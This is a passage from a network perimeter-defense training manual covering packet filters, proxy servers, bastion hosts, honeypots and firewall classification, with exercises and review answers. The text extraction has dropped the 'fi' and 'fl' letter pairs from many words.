174 Tactical Perimeter Defense
The stateful packet lter will remove entries in the state table if there is no
response, usually within a few minutes. This is to ensure there are no holes left
open for an attacker to exploit. The rules are programmed into the stateful packet
lter, just as they are in a stateless packet lter, although they may be called poli-
cies instead of rules.
How Attackers Get Around Packet Filters
Although packet lters are solid security devices, they need to be supplemented
with other services the rewall can perform, such as proxy and NAT. Still, you
may be wondering how attackers get around packet lters. Some of the exploits
are due to poor design by the rewall administrator, yet others are limitations
imposed by packet ltering itself.
Many packet lters will drop fragment 0 (called the 0th fragment), but allow the
remaining fragments through. This can be a serious security hole, so be sure to
check how your rewall handles fragmentation. The attacker can simply place a
whole valid packet in one that has been marked as fragment 1, effectively bypass-
ing the security of the packet lter completely.
One of the most critical errors is not in the technology, but in the implementation
of the lter. If you had only a web server and email server on your network, and
you congured the packet lter to only allow ports 80, 443, and 25 in, all other
inbound ports were closed, and all outbound ports open, you have a very insecure
network. The outgoing ports are as critical to congure as the inbound ports.
Make sure you do not fall into this trap of blocking only inbound ports. It may
look secure, but it is not.
These are two examples of how packet ltering can be bypassed, and examples
of why additional security services are needed.
TASK 4C-1
Firewall Rule Creation
1. Read through the following scenario of a corporate network.
Your network is a mixed environment of Windows NT, Windows 2000,
UNIX, and Linux. Your users in the network need to access FTP sites for
upload and download, websites, and email servers on the Internet. Your net-
Lesson 4: Designing Firewalls 175
work provides a web server and email server that need to be accessed by the
Internet.
2. Based on this scenario, create a sample rule set, or portion thereof,
needed for this packet lter.
Topic 4D
Proxy Server
As you have seen, packet lters are a great start to securing the network with a
rewall. But, they also require help to create a more secure environment. One of
the ways to increase security is to add the services of a proxy server.
Proxy servers were initially used to cache commonly visited web pages, speeding
up the network and Internet use. They have evolved to not only cache web pages,
but have become part of the security system of a network.
The packet lter, as discussed, works by inspecting the header information and
basing the decision on dened rules or policies. The proxy works at the applica-
tion layer, and is able to provide services to the network. The proxy acts as a sort
of gateway (which is why it is also called an application gateway), for all packets
to ow through.
When a proxy is congured and running on the network, there is no direct com-
munication between the client and the server. The packet lter allows for this
direct communication, while the proxy prevents it.
A signicant distinction then between a packet lter and a proxy server is that the
proxy understands the application or service that is used, and the packet lter
does not. The proxy server can then permit or deny access, based on what actual
function the user is trying to perform.
176 Tactical Perimeter Defense
Proxy Process
In this example, the client has requested a web page, and identied the server that
has the web page. The request for the web page is passed to the proxy server. At
this point, the proxy server does not act as a router and forward the packet. What
it does is consult its set of rules regarding this service (WWW in this case), and
decide if the request is to be granted or not.
Once the proxy has made the decision to allow the request, a new packet is cre-
ated with a source IP address of the proxy server. This new packet is the request
for the web page from the destination server. The web server receives the request,
and returns the web page to the requesting host. Since the proxy is running, the
requesting host is the proxy server.
When the proxy receives the web page, it checks its rules to see if this page is to
be allowed. Once the decision is made to proceed, the proxy makes a new packet
with the web page as the payload, and sends this to the original client.
The following gure is an illustration of the basic function that a proxy server
plays in the network. Notice the client packet never directly reaches the server,
and vice versa.
Figure 4-12: A WWW proxy running in a network.
This type of service can increase the security of the network considerably, as no
packets can pass directly from the client to the server. The proxy service will
need to be congured for each type of service that is allowed. For example, a
separate proxy will be needed for SMTP, WWW, FTP, and Telnet, if all these
services are to be used.
The proxy server needs to be congured to work in both directions, just as a
packet lter. This is the only way to be sure no packets are passed by the proxy
server.
Lesson 4: Designing Firewalls 177
Proxy Benefits
There are several benets to the network, from a security point of view, that a
proxy can provide. The list of advantages can be large; provided are the major
benets:
Client invisibility.
Content ltering.
Single point of logging.
Client Invisibility
The basic proxy process highlights this feature. The ability to have the clients
inside IP address never appear to the Internet is a great benet. Attackers not
knowing the internal structure of the network have a harder time gaining access
and attacking internal clients.
Content Filtering
In the modern era, businesses have to be very sensitive to the needs of
employees. This includes exposure to any offensive material, as much as can be
prevented.
Content lters can be programmed for many types of inspection. They may be
programmed to look for certain keywords or phrases. Many employers use lter-
ing to block the websites of major headhunters and resume posting sites.
These lters can also be used to prevent Active-X controls from being down-
loaded, Java Applets being run, or executables being attached to email.
Single Point of Logging
One of the more signicant benets of proxy servers may be the ability to have a
single point of reference for logging data. Since all traffic is owing through a
single point, it is relatively easy to re-create an entire session of web browsing
for a user to identify problems.
Proxy Problems
Even though it seems as if there are only benets to adding proxies, and in most
cases this may be true, you need to be aware of potential problems of using
proxies. As with all technologies, there are possible issues that may arise, such
as:
Single point of failure.
A proxy for each service.
Default congurations.
Single Point of Failure
Perhaps one of the most serious issues with a proxy server is the creation of a
single point of failure. If the entire network is running through the same proxy,
that machine becomes quite critical, and must be congured properly.
A common mistake is to forget that the proxy itself is unprotected. Although it is
protecting the internal network, if there is an interface directly connected to the
Internet, it is wide-open to attack, both to Denial of Service and intrusion
attempts.
178 Tactical Perimeter Defense
Be sure that the proxy is, in addition to other security mechanisms (such as a
packet lter), used to reduce the likelihood of a direct intrusion attack on the
proxy. If the entire network is dependent on this machine, you need to take good
care of it!
A Proxy for Each Service
More of a conguration issue, but still worth noting, is that the proxy must be
congured for each service. If the network is allowing many different types of
services in both directions, this can create considerable work. When services are
added, it is important that the proxy server remain securely congured.
Default Configurations
The majority of proxy server software is designed for functionality over security.
The applications are created to get users up and running quickly, and give them
access to the resources they need.
This is the opposite of security. Therefore, when implementing a proxy, it is rec-
ommended to not use the default congurations. Take the time to implement the
rules and restrictions, as they are needed.
TASK 4D-1
Diagram the Proxy Process
1. Diagram the process of an internal client in the network requesting an
email message from the remote server running SMTP.
Lesson 4: Designing Firewalls 179
Topic 4E
The Bastion Host
In order to create a rewall or proxy, there must be a platform for the software to
use. In some instances, there is a dedicated piece of hardware that will run the
rewall software. In this topic, you will learn about the process of setting up a
server to run the software. This server is called the bastion host.
Bastion host is a term used for a computer that has been hardened in a manner
much more securely than any other computers in the network. This server is
using every security option that comes with the operating system to the maximum
that it can be used. All auditing has been congured, all authentication has been
congured, and encryption (where relevant) has been congured.
Further conguration would be the removal of all services and applications not
deemed absolutely necessary for the server to function. All user accounts are
removed, except for those required for server management. Every service, appli-
cation, and user account that is removed is one less target for a potential attacker.
Once the computer has been congured, then the software may be installed and
congured on top of the base operating system. This computer should not be con-
sidered the single line of defense, but rather, one link in a chain. The security of
the network cannot rely on a single component, so the bastion host is one of sev-
eral in a well designed network, as shown in the following gure.
The rst line of defense is the router, connecting the network to the Internet,
which should be congured with appropriate packet ltering. Following the
packet ltering router is where the bastion host running proxy services is located.
If the network is small, one bastion host running the proxy services for the entire
network may be ne. In a large network, there are likely to be many bastion
hosts, each running different proxy services.
Figure 4-13: : The most likely location of a bastion host.
180 Tactical Perimeter Defense
The basic steps that must be followed in setting up a host as a Bastion are:
Remove unused applications.
Remove unused services.
Remove unused user accounts.
Enable auditing.
Other standard techniques for creating a Bastion host to run as a rewall are:
Install the operating system from scratch, formatting the disk rst.
Do not use a dual-boot computer.
Remove unused hardware, such as modems or sound cards.
Use very strong authentication methods, such as a tokens or biometrics.
Implement a utility to check les for tampering, such as TripWire.
An Attack on the Bastion Host
Since this computer is the machine that is providing many services to your net-
work, it is likely to be the target for many different attacks.
However, since you have set up the computer properly ahead of time, you have
the ability to deal with these attacks. Since you have enabled logging and audit-
ing, the intrusion should be detected quickly with a scan of the logs and
generated reports.
Inevitably, there may be an attack you do not catch right away. It is this part of
security that drives administrators mad. Once you catch the intrusion, you must
investigate further to determine the cause. This is where your le tampering soft-
ware comes into play. You must identify if there has been a Trojan placed on the
host, or if any system les have been accessed. Once the bastion host has had an
intrusion, it is critical that the remaining computers in the DMZ or network, be
examined quickly for possible intrusions. A compromised bastion host often leads
to a compromised network.
An important point that must be made is in relation to the knee-jerk reaction that
many administrators have in these situations, which is to attempt the restoration
of the system from backup once it has been compromised. Unless you can iden-
tify the date that the intrusion happened, how can you be sure your backup is not
also infected?
The best solution is to begin from scratch and re-create the bastion host, starting
with formatting the disk. It will take time, but it is the best way to restore this
host to the network.
Lesson 4: Designing Firewalls 181
TASK 4E-1
Describing a Bastion Host
1. Describe the function of a bastion host in creating a secure network
environment.
Bastion host is a term used for a computer that has one or more network
interfaces exposed to the Internet. The OS (typically a server OS) on such a
device is hardened in a much more secure manner than any other computers
in the network. Further conguration would be the removal of all services
and applications not deemed absolutely necessary for the server to function.
Once the computer has been congured, then the software that dictates rule
sets for internal or external traffc may be installed and congured on top of
the hardened OS.
Topic 4F
The Honeypot
One area that is the subject of much discussion in security circles is the use and
deployment of honeypots. For some security professionals, network security is
not fully functional without one, while others feel it is an unneeded and poten-
tially dangerous part of the network.
What is a Honeypot?
Just as honey attracts bears, a honeypot is a computer designed to attract
attackers. If an attacker has managed to get past your packet lter into your DMZ
and is scanning for options, the honeypot should be the one computer that sticks
out. This is depicted in Figure 4-14.
182 Tactical Perimeter Defense
Figure 4-14: Two examples of where the honeypot may be located.
Goals of the Honeypot
There are several goals for the honeypot. You would like the honeypot to provide
enough of a lure that attackers stay away from your other equipment. You want
the attacker to see a vulnerability that they know they can exploit and use to gain
access to the computer. This vulnerability needs to be such that the attacker
focuses their energy on exploiting this computer, as opposed to the email server
(for example) sitting right next to it.
In addition to trying to keep attackers away from your more secure systems, one
of the goals of a honeypot is for logging. Knowing that this system is one that
will be attacked, you can take extra measures in logging. These logs should be
moved off the system frequently, perhaps hourly or daily if your network is a
high prole target.
Another goal of the honeypot is to increase the ability to detect and respond to
incidents. The theory is that if you are aware of what the attacker is doing to
your honeypot, you can be better prepared to defend or, if possible, prevent that
attack from being carried out successfully against your production systems.
To take the concept of the honeypot further, there are instances of honeynets. A
honeynet is an entire network designed to be an attractive alternative to the pro-
duction network(s) it is deployed to screen from view. The premise is the same,
only the scale is bigger.
Lesson 4: Designing Firewalls 183
Legal Issues
A discussion of honeypots would not be complete without a discussion of the
legal issues surrounding this use of technology. Perhaps the single biggest issue
involving a honeypot today is the issue of entrapment. Some people feel that the
setup of a honeypot is entrapment, and therefore, the same rules apply as in the
real world. Up to this point, that is not yet the case. Although, it should be noted
that defense attorneys have tried using entrapment as a defense.
Another issue is that of privacy. If an attacker were to set up an IRC server on
the honeypot, it is possible for the administrator to log all conversations on that
server. For now, this issue is more of a moral and ethical dilemma than a legal
one, since there is no dened law regarding this subject. However, it should be
noted again that this could be a viable defense for an attorney to work with.
The current standard for this issue is the Searching and Seizing Computers and
Obtaining Electronic Evidence in Criminal Investigations. This publication is by
the Computer Crime and Intellectual Property Section, Criminal Division, United
States Department of Justice, and is part of the Computer Crime and Intellectual
Property Section (CCIPS). The entire document can be found atwww.usdoj.gov/
criminal/cybercrime/searching.html#searchmanual
TASK 4F-1
Honeypot Configuration
1. What are the services most likely to be enabled in creating a honeypot,
and why?
Most likely services would include the normal WWW, TFP, SMTP, POP3,and
Telnet. It is important to offer the normal services, since the honeypot must
appear to be a productive, live computer in the network, and should be con-
gured the same as a production WWW server, perhaps with looser
permissions and solid logging.
Summary
In this lesson, you identied the major components used in building rewall
systems; you learned to detail the methods used to create a rewall policy in
a network scenario. You now know how packet lters are used in rewall
systems. You can also describe the process of creating a bastion host, as
well as how to use proxy servers in rewall systems. You are also aware of
the process involved in creating a honeypot and can differentiate between a
honeypot and a honeynet.
184 Tactical Perimeter Defense
Lesson Review
4A Name two methodologies for rewalls.
Packet ltering and proxy servers (application gateway).
What are three services a rewall can provide?
Network Access Translation (NAT), data caching, and restricting access to
content.
How can a second connection to a client computer make an impact on
rewall security?
A second connection will render much of the rewall useless to this client,
and maybe even the network.
Name four different methods of implementing a rewall.
A Single Packet Filtering Device.
A Multi-homed Device.
A Screened Host.
A Demilitarized Zone.
4B What is the difference between a rewall policy and a security policy?
A rewall policy is generally a subset of the overall security policy.
List three items that should be in a security policy, but not part of a
rewall policy.
Many portions of the following items may address issues broader than that
addressed by the Firewall policy:
The Acceptable Use Statement.
The Network Connection Statement.
The Contracted Worker Statement.
List at least three items that would be specic to the rewall policy.
Answers may include: Users may access WWW on port 80 as required; users
may not access NNTP on any port; users not in subnet 10.0.10.0 are not
allowed to Telnet to any location; any policies dealing with rewall
administration.
4C What is the primary difference between stateful and stateless packet l-
ters?
Stateless packet lters make a decision about a packet based on any portion
of the protocol header; however, the vast majority of lters are based on the
most signicant information in the header.
Stateful packet lters encompass the techniques used by stateless packet l-
ters; however, they do not base their decisions on individual packets. Stateful
packet lters increase security by remembering the state of connections at
the network and the session layers as they pass through the lter. This ses-
sion information is stored and analyzed on all packets moving through the
lter.
Lesson 4: Designing Firewalls 185
In addition to IP addresses, what else can a packet lter use to make a
decision on a packet?
Fragmentation, IP Protocol ID, Protocol Type, and TCP or UDP Port
Numbers.
How can an attacker use fragmentation to get through a packet lter?
By encapsulating the entire payload in one or more fragments following the
rst fragment.
4D What are the benets of implementing a proxy server?
While packet lters allow for direct communication between a client and a
server, proxy servers prevent it. The proxy works at the application layer
(application gateway). Proxies can inspect packet content and make deci-
sions based on this inspection.
Describe three potential problem issues for proxy servers.
Single point of failure: If the entire network is running through the same
proxy, that machine becomes quite critical, and must be congured properly.
The proxy itself is unprotected if there is an interface directly connected to
the Internet. You have to add at least a packet lter in front of the proxy. A
proxy for each service: The proxy must be congured for each service. If the
network allows many different types of services in both directions, this can
create considerable work. Default conguration: Using the default (out-of-
the-box) conguration is generally not secure.
4E What are the steps that must be followed to create a bastion host?
1. Remove unused applications.
2. Remove unused services.
3. Remove unused user accounts.
4. Enable auditing.
What are some additional steps that are recommended in securing the
bastion host?
Install the operating system from scratch, formatting the disk rst. Do not
use a dual-boot computer. Remove unused hardware, such as modems or
sound cards. Use very strong authentication methods, such as a tokens or
biometrics. Implement a utility to check les for tampering, such as
TripWire.
How should a compromised bastion host be recovered?
A compromised bastion host often leads to a compromised network. Once the
bastion host has had an intrusion, it is critical that the remaining computers
in the DMZ or network be examined quickly for possible intrusions. Identify
the date of the intrusion before you restore the bastion host from backup.
The best solution is to begin from scratch and re-create the bastion host,
starting with formatting the disk.
4F Where should a honeypot be located in the network?
In the screened subnet or DMZ.
186 Tactical Perimeter Defense
What are two of the goals of a honeypot?
Answers may include: Lure the attacker; log visits; and respond to incidents.
What are some potential legal issues of honeypots?
Entrapment and privacy issues.
Lesson 4: Designing Firewalls 187
188 Tactical Perimeter Defense
Configuring Firewalls
Overview
In this lesson, you will rst review rewalls from a conceptual viewpoint to
learn about the types of rewalls, how each of these types work, and what
protection they can provide for your network. After you have the founda-
tional concepts under your belt, you will go through a series of exercises to
actually implement two different rewall solutions: Microsofts Internet
Security and Acceleration server, which runs on top of the Windows plat-
form; and IPTables, which runs on top of the Linux platform. This will
provide you with the practical working knowledge to implement a rewall
in your network environment.
Objectives
To congure network rewalls in the defense of a network, you will:
5A Describe standard rewall functionality and common implementation
practices.
Firewalls come in a wide variety of avors today. In addition to the many
vendor offerings, there are also many versions of build your own
rewalls. Regardless of the rewall implementation you are working with,
there are commonalities between them, both functionally and in imple-
mentation methodologies. Exploring these commonalities will provide you
with a solid foundation for developing mastery of rewall
implementation.
5B Install, congure, and monitor Microsoft ISA Server 2006.
In this topic, you will install Microsoft ISA Server 2006 and work with
the built-in conguration tools. In addition, you will explore options for
managing, monitoring, and auditing ISA Server 2006.
5C Examine the concepts of Linux IPTables.
In this topic, you will examine how IPTables creates a chain of rules
that can control the egress and ingress of specic network traffic.
IPTables is a popular build-your-own type of rewall that you will nd
implemented in many networks.
5D Apply rewall concepts and knowledge to a scenario.
In this topic, you will be given a specic network situation, and you will
then design rewall topology and rule sets to create the required rewall
security posture.
Data Files
ISAScwHlpPack.exe
Lesson Time
5 hours
LESSON
5
Lesson 5: Conguring Firewalls 189
Topic 5A
Understanding Firewalls
Technology-based rewalls rst appeared on the networking scene in the early
1990s. As the Internet and networks in general have developed and progressed, so
have the potential digital dangers. Firewalls have progressed right along side,
developing from simple gatekeepers to comprehensive security tools that can
work in conjunction with intrusion detection systems and malware scanners.
Security has become increasingly problematic for systems connected to the
Internet. Network intrusions and attacks have now become so common that the
risk is understood as an unavoidable part of conducting business in the digital
age. In a modern network, rewall technology is a mainline component for any
organization that has dened a network security architecture. Even home users
connected to the Internet through commercial ISP connections regularly install
software and hardware rewalls to provide a measure of protection for their per-
sonal systems.
Fear notin this module we are going to lift the veil of mystery and discover
what a rewall does and how rewalls actually work. Firewalls generally com-
prise the rst line of defense for a network and, therefore, a solid working
understanding of rewalls is essential in todays modern networked world. You
will also examine how to implement and congure two popular platform specic
rewalls: Microsoft Internet Acceleration Server 2006 and the built-in Linux
rewall, IPTables. Lets examine some rewall basics now.
Firewall Basics
A basic understanding of what rewalls are and how they work will give us a
common framework of reference. We can then build our practical skills on top of
this framework when we investigate how to implement and congure our two
rewalls. This will be most effective if we can derive the answers to the follow-
ing questions:
What is a network rewall?
What are common rewall related terms?
What are the basic functions of a rewall?
What do addresses, ports, protocols, and services have to do with a rewall?
What are the common types of rewalls?
How are rewall rules built?
What are the common rewall network topologies?
Why would I want a rewall?
What can a rewall not protect me from?
What is a Network Firewall?
A rewall can be described as a security mechanism that places limitation con-
trols on all inbound and outbound network communications between individual
systems or entire networks of systems by permitting, denying, or acting as a
proxy for all data connections.
190 Tactical Perimeter Defense
Figure 5-1: Firewalls control network communication.
A rewall is generally comprised of a software program (code) that works in con-
junction with a hardware device that is responsible for physically transmitting
network data. Firewalls can exist as a software program installed on top of an
operating system or as a specialized hardware device running proprietary code.
Depending on the size and complexity of the environment being protected,
rewalls can be congured as a single system or have multiple systems working
in concert.
Many rewalls are capable of handling multiple types of transport protocols
(TCP/IP, IPX/SPX, etc.). However, for the purposes of our discussion here, we
will operate under the assumption that you are going to be using the current
industry standard, TCP/IP, as your network transport protocol of choice.
Firewall Terms
We know that networks are made up of multiple connected systems, all with
varying degrees or levels of trust between them. Your daily interactions with the
network of humans around you is a good illustration of the principal of
networked trust. For example, you might trust your best friend with the keys to
your car, but certainly not the person who you just met at the car wash.
In a networked environment, these areas of interaction can be referred to as
zones of trust. Some common examples of these zones would be the Internet,
which is a zone with little or no trust; and your internal network, which would a
zone with a high level of trust.
Figure 5-2: Firewalls separate zones of trust.
Lesson 5: Conguring Firewalls 191
The networking world has spawned a variety of terms such as Internet, Extranet,
intranet, and DMZ. We can use these terms to dene the zones of trust that com-
monly occur in any given network environment.
Internet: This zone of trust corresponds to the worldwide public network of
systems. Since this zone is accessible by anyone, it is our least trusted zone.
In rewall terminology, this is often referred to as an unprotected or external
network.
Intranet: An intranet is a private network that is used to securely share an
organizations information or operations within the organization. In rewall
terminology, this is often referred to as a protected or internal network.
Extranet: This zone of trust is a semi-private network that an organization
creates to share parts of their private network with business partners such as
customers, suppliers, or other collaborative partners. Basically, this is an
extension of the private zone of trust to include specic types of access to
approved outside entities.
DMZ: The Demilitarized Zone of trust is a network segment or segments
located between protected and unprotected networks. DMZs are generally
congured in one of two basic topologies: chained and three-legged. A
chained DMZ is isolated in a linear fashion between the trusted and
un-trusted zones by a rewall on either side, whereas a three-legged DMZ is
connected to a third interface off of a single rewall that separates the
trusted and un-trusted zones creating a third network spoke off of the
rewall.
Basic Functions of a Firewall
A rewalls primary function is to control the communications between systems
and or networks that exist in zones with differing trust levels. The rewalls con-
trol of network communication across zones of trust allows us to enforce our
security policy. This enables us to create a network connectivity model based on
the principle of least privilege and set up varying levels of access based on the
source, destination, and type of network communication.
Figure 5-3: Firewalls enforce access rules between zones of trust.
192 Tactical Perimeter Defense
Address, Port, Protocol, and Services: The Building
Blocks of Firewall Rules
In order to really understand what a rewall does, it will be helpful to take a
quick review of how network communications work, especially in respect to the
Internet Protocol. All Internet Protocol communications have several properties in
common. It is these common properties that allow a rewall to perform most of
its functionality. There are ve basic commonalities generally present in network
communications over the Internet Protocol:
Source address: This is where the communication originated from.
Destination address: This is where the communication is going to.
Protocol used: This could be TCP, UDP, ICMP, IGMP, etc.
Target port: A port is an endpoint to a logical network connection. This port
number is how a network request species a specic service from a remote
resource on a network. (IANA RFC 1700 species well known port
numbers.)
Service: This is the application that is offering the data or functionality
requested by the connection. Generally, services listen for requests on a spe-
cic port over a specic protocol.
We use similar types of mechanisms in our non-digital daily lives to move infor-
mation from one place to another. A good example of this would be returning a
defective computer part to a manufacturer.
We know that we are sending the part from ourselves (the Source).
Then, we obtain the manufacturers address (the Destination).
We decide on a shipper: FedEx , UPS, DHL, etc. (the Protocol).
We also add Attention: RMA department to the label (the Port).
Because of how we addressed, shipped, and labeled the package, when it
arrives at the manufacturer, it will be handed over to the warranty service
department for repair or replacement (the Service).
From this example, you can see that the concepts of source, destination, protocol,
port, and service are commonly used in our daily lives. In relationship to a
rewall, these commonalities that occur in network communication form the
building blocks of rule sets that rewalls use to control access to and from net-
work entities.
Firewalls and the OSI Model
To simplify the complexities of networking heterogeneous systems it is often use-
ful to use the Open Systems Interconnect (OSI) model as a frame of reference.
The OSI model is an abstraction of network communications between computer
systems and network devices.
Lesson 5: Conguring Firewalls 193
Figure 5-4: The Open Systems Interconnection (OSI) model.
In a nutshell, the layers of the OSI model perform the following functions:
Layer 7: Application - Interface from network to applications
Layer 6: Presentation - Handles data representation and encryption
Layer 5: Session - Manages connections between applications
Layer 4: Transport - Provides end-to-end connections and reliability
Layer 3: Network - Path determination and logical addressing (IP)
Layer 2: Data Link - Physical addressing (MAC & LLC)
Layer 1: Physical - Media, signal, and binary transmission
A full discussion of the OSI model is outside the scope of this module, but those
layers relevant to the topic of rewalls will help us understand how they function.
Current rewall technology operates on the OSI model layers as shown in the
following gure.
Figure 5-5: Firewalls operate at Layers 2, 3, 4, and 7 of the OSI model.
194 Tactical Perimeter Defense
Firewalls generally operate at the levels corresponding to OSI Layers, 2, 3, 4, and
7. The common network functionalities of source and destination address, proto-
col, port, and services that we examined earlier are described as operating on
these layers of the OSI model.
Layer 2 (Data Link) is the lowest layer that contains addressing that can uniquely
identify a single specic source or destination. These addresses are the MAC, or
Media Access Control addresses, and are assigned to physical network interfaces.
For example, a MAC address belonging to a standard Ethernet card is an example
of a Layer 2 address. This is one layer that can be used by a rewall to discrimi-
nate source and destination addresses for communications control.
Layer 3 (Network) is the layer that handles the delivery of network traffic by pro-
viding switching and routing technologies, creating virtual circuits (logical paths),
and transmitting data from node to node. Source and destination addressing, rout-
ing, forwarding, packet sequencing, error handling, and ow control are handled
at this layer. Like layer 2, Layer 3 can also be used by a rewall to discriminate
source and destination addresses for communications control.
Layer 4 (Transport) is the layer that identies end-to-end network communication
mechanisms and communication sessions. This is the layer where the transport
protocol is assigned, e.g. TCP, UDP, ICMP, etc., and the source and destination
ports are specied. Firewalls can examine the protocol and port information from
Layer 4 and use these values to control network communication.
Layer 7 (Application) supports both application (service) and end-user processes.
This layer is where such things as communication partners, authentication, quality
of service, and any data syntax constraints are identied. Everything at this layer
is application specic. Data is passed from the program in an application-specic
format, then encapsulated and passed to the layers below. Firewalls can use a host
of information, such as service specic information that occurs at the application
layer to inspect and control inbound and outbound data communication to
enhance your security posture.
The additional layer coverage enables the rewall to handle advanced applications
and protocols. A good example of this would be user authentication. A simple
rewall that functions only on Layers 2 and 3 will not normally be able to distin-
guish individual users, whereas a rewall with awareness of the application level
(level 7) can enforce communications policies based on user authentication.
Classifying Firewalls
Firewalls have continued to evolve since their inception and are continuing to
grow more sophisticated. As with any sophisticated system, a methodology for
classication can facilitate understanding. The simplest way for you to classify
rewalls is by how they handle the process of controlling network
communications.
Is the communication control being done between a single system and a net-
work, or between two or more network segments?
Firewalls that control communication with a single system are generally
called Personal Firewalls.
Firewalls that control communication between network segments are
called Network Firewalls.
Is the communication intercepted and inspected at the network layer or at the
application layer?
Network-layer rewalls are called Packet Filter Firewalls.
Lesson 5: Conguring Firewalls 195
Application-layer rewalls are called Application Gateways or Proxy
Firewalls.
Is the communication state being tracked and maintained by the rewall?
If the rewall does not track the communication state, it is classied as
a Stateless Firewall.
If the rewall tracks the state of connections, it is classied as a
Stateful Firewall.
Examining the Common Types of Firewalls
For both Personal Firewalls and Network Firewalls, there are three common types
of rewalls in general use today: Simple Packet Filter Firewalls, Stateful Packet
Filter Firewalls, and Application Level Firewalls. Lets examine the strengths and
weaknesses of each of these types of rewalls.
Simple Packet Filtering Firewalls
Simple packet lters are the most fundamental type of rewall. They inspect the
individual inbound or outbound packets of network data and compare them
against a rule set to determine if the packet should be permitted or denied.
In their most basic form, packet lter rewalls operate at the OSI model Layers 2
(Data Link) and 3 (Network). They provide network access control by comparing
the rule set to information contained in the network packet such as:
The source address of the packet, which is the IP address of the system the
network packet originated from.
The destination address of the packet, which is the IP address of the system
the network packet is sent to.
The network protocol being used to communicate between the source and
destination addresses.
Some simple packet lters will also include some characteristics of Layer 4
communications such as the source and destination ports of the connection.
If the rewall is multi-homed to three or more network segments (such as in
a three-legged DMZ conguration), a packet lter rewall also reads the
packet information pertaining to which interface of the rewall the source
packet arrived from and which interface of the rewall the packet is destined
for.
196 Tactical Perimeter Defense
Figure 5-6: OSI Layers of inspection for a Simple Packet Filter Firewall.
Weaknesses of Simple Packet Filter Firewalls
If you are using a simple packet lter rewall, there are several inherent weak-
nesses in this type of rewall that you should be aware of and take special care
to overcome where possible.
Application Specic Vulnerabilities: Packet lter rewalls do not inspect
upper layer data, and therefore cannot protect against intrusions that make
use of application specic vulnerabilities.
Limited Logging: Since so little information is gathered by the rewall, the
simple packet lter has limited logging capabilities, which limits the data
available for policy making decisions and can hamper intrusion
investigations.
No Authentication: Because they operate at the OSI layers below where
authentication happens, simple packet lter rewalls cannot generally make
use of user authentication as part of their control mechanisms.
Vulnerable to Spoong: There are several weaknesses in the TCP/IP speci-
cation and protocol stack that packet lters have a tough time overcoming. A
good example of this would be network layer address spoong. Many simple
packet lter rewalls cannot detect whether the OSI Layer 3 addressing
information in a packet has been altered. This leaves them vulnerable to
spoong attacks.
Large Attack Surface: Another weakness of simple packet lter rewalls is
due to the way that TCP connections are established. In general, network
services are requested on a well-known low numbered port (<1023) and the
return client connection is established on a random high numbered port
(>1023). So if you are using a simple packet lter rewall, you normally
have to open all ports greater than 1023 inbound so they are available for
return client connections. This leaves a very large attack surface exposed to
the outside network.
Easy to Miscongure: Simple packet lter rewalls have very few variables
to use for inspection and rule set creation. When attempting to create com-
plex and comprehensive rule sets, it is easy to accidentally congure a rule
Lesson 5: Conguring Firewalls 197
to either allow or fail to deny network traffic that your network policy states
should be denied. Conversely, it is also easy to block traffic that should be
permitted.
Stateful Packet Filter Firewalls
We have already discovered that simple packet lter rewalls operate across lev-
els 2 and 3 of the OSI model. The stateful packet rewall adds level 4 awareness
in addition to levels 2 and 3. Because they can keep track of logical virtual con-
nection circuits, these rewalls are also sometimes referred to as Circuit Level
rewalls.
Figure 5-7: OSI Layers of inspection for a Stateful Packet Filter Firewall.
Stateful packet lters control traffic in basically the same manner as a simple
packet lter by using rule sets, but they have additional intelligence in their logic
that enhances their performance and solves several challenges with simple packet
lter rewalls.
The stateful moniker comes from the fact that these rewalls keep track of the
state of all accepted connections in a data table that resides in memory. This
enables the rewall to determine if an incoming packet is either a new connection
or is part of an existing established connection.
Once the connection session has ended or has timed out, its corresponding entry
in the state-table is discarded. Some applications can send periodic keepalive
packets in order to stop a rewall from dropping the connection during periods of
low user-activity.
198 Tactical Perimeter Defense
Figure 5-8: Example of a connection state table.
This ability to discriminate between new connections and existing ones brings
several advantages to this type of rewall over a simple packet lter.
Lower Attack Footprint: Stateful rewalls can take additional actions based
on data residing in the state tables such as dynamically opening return cli-
ent ports for each individual connection. This lowers your attack footprint,
which increases your security posture.
Less Susceptible to Spoong: A stateful rewall is able to hold in memory
key attributes of individual connections. These attributes help the rewall
track the state of the connection. Attributes stored in memory include the IP
addresses and ports for both ends of the connection and also the sequence
numbers of the data packets sent through the connection. The stateful
rewalls awareness of IP addresses and sequence numbers makes it far less
susceptible to spoong.
Easy Black hole conguration: Stateful rewalls can easily be congured to
pass all outgoing packets through, but to only permit incoming packets if
they are part of an established connection that is listed in the state table.
This prevents intruders from starting unsolicited connections to resources in
the protected network. Coupled with a rule to discard unsolicited packets,
this turns your network into a black hole on the Internet.
Less Resource Intensive: Tracking the connection state gives stateful
rewalls an increased efficiency in their packet inspection process. Packets
for existing connections through the rewall only have to be checked against
the state table, which is less resource intensive than checking the packet
against the rewalls lter rules set.
Stateful inspection rewalls share some of the weaknesses of packet lter
rewalls; however, the advantages created by the state table implementation
means that stateful inspection rewalls are generally more secure than simple
packet lter rewalls.
Application Level Firewalls
Application level rewalls (also sometimes called Application-Proxy Gateways)
are sophisticated rewalls that combine inspection of both the lower layer access
controls with the upper 7th layer of the OSI model (Application Layer). Applica-
tion level rewalls control the routing of packets between the trusted and
un-trusted zones congured on the rewall based on what application or service
is sending or receiving the data packets. All network data packets that pass
through the rewall do so under the control of the application-proxy software.
Lesson 5: Conguring Firewalls 199
Figure 5-9: OSI Layers of inspection for an Application Level Firewall.
Application level rewalls are capable of doing deep packet inspection in order to
make accurate appraisals of which connections to allow and which to deny. By
reading the actual data inside of a packet, application level rewalls are able to
detect bypass attempts such as masking non-permitted communications inside of
packets sent over permitted ports, for example, hiding IRC communications pack-
ets by using port 80 to masquerade as http. Traditional stateful rewalls cannot
detect this, while an application level rewall can inspect and deny HTTP packets
if the content does not match the packet type.
Application level rewalls also generally have the ability to require authentication
of each user or system attempting to transmit data across the rewall. A wide
variety of authentication forms are available, including:
User ID and Password Authentication
Hardware or Software Token Authentication
Source Address Authentication
Biometric Authentication
Application level rewalls have several advantages over both types of lower level
packet lter rewalls we previously examined.
Extensive Logging Capabilities: Application level rewalls have extensive
logging capabilities because the rewall is able to examine the entire net-
work packet contents instead of just the lower level network addresses and
ports. Application level rewall logs often will contain application-specic
commands issued over the network data packets. This can be very useful for
both policy management and intrusion incident investigation.
Enforcement of Authentication: The authentication capabilities built into
application level rewalls are vastly superior to those found in packet lter
or stateful inspection packet lter rewalls. Application level rewalls allow
you to set enforcement rules on the available types of authentication that are
most appropriate for a network environment as opposed to just using lower
